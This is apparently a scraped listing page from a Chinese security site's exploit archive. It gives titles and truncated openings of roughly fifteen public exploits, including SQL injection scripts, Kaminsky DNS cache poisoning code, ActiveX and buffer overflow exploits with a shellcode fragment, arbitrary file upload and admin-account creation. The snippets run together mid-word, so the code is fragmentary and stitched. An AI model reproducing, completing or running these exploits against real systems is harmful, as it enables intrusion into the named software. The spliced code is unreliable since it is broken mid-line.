网络安全 > Exploit >
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
#!/usr/bin/perl use IO::Socket; print q{ ----------------------------------------------- Arctic Issue Tracker v2.0.0 exploit by ldma ~ SubCode ~ use: arctic.pl [server] [dir] sample: $perl arctic.pl localhosKaminsky DNS Cache Poisoning Flaw Exploit for Domains
____ ____ __ __ / / | | | | ----====####/ /__##/ / ##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======###### / /#| |##| |#|IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
#!/usr/bin/perl # use warnings; use strict; # CMD="c:windowssystem32calc.exe" # [*] x86/alpha_mixed succeeded, final size 344 my $shellcode = "xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a&BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
from scapy import * import random # Copyright (C) 2008 Julien Desfossez <ju@klipix.org> # http://www.solisproject.net/ # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU GenWordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2> <h3>SaO</h3> <h4>BiyoSecurityTeam || www.biyosecurity.com</h4> <i>Plugin URI: http://Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovered by Oliver Lavery http://www.securityfocus.BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
/* * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack * * Compilation: * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm * * Dependency: libdnet (aka libdumbnet-dev under Ubuntu) * * Author:Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit
<!-- Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit written by e.b. Tested on Windows XP SP2(fully patched) English, IE6 IE7, OfficeScan 7.3 patch 4, OfficeScanRemoveCtrl.dll version 7.3.0.1020 The contIceBB
# Author: __GiReX__ 26/07/08 # Homepage: girex.altervista.org # CMS: IceBB <= 1.0-RC9.2 # Site: icebb.net # Bug: Blind SQL Injection # Exploit: Session Hijacking PoC # Works regardless of php.ini settings # Description:e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit
#!/usr/bin/perl ##################################################################################### # e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit # # ..::virangar security teCisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
/* Cisco IOS FTP server remote exploit by Andy Davis 2008 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit
<?php @session_start(); ?> <table align=center width=72% height=95% ><tr><td> <?php /* HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability [~] Discoverd & exploited by Stack [~]GHIOX Random Ad 1.3 Arbitrary Add Admin User Exploit
<?php @session_start(); ?> <table align=center width=72% height=95% ><tr><td> <?php /* HIOX Random Ad 1.3 Arbitrary Add Admin User Vulnerability [~] Discoverd & exploited by Stack [~]Greeatz AlleNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
#!/usr/bin/perl #/----------------------------------------------- #| /----------------------------------------- | #| | Remote SQL Exploit | | #| | eNdonesia 8.4 Remote SQL Exploit | | #| | www.endonesia.o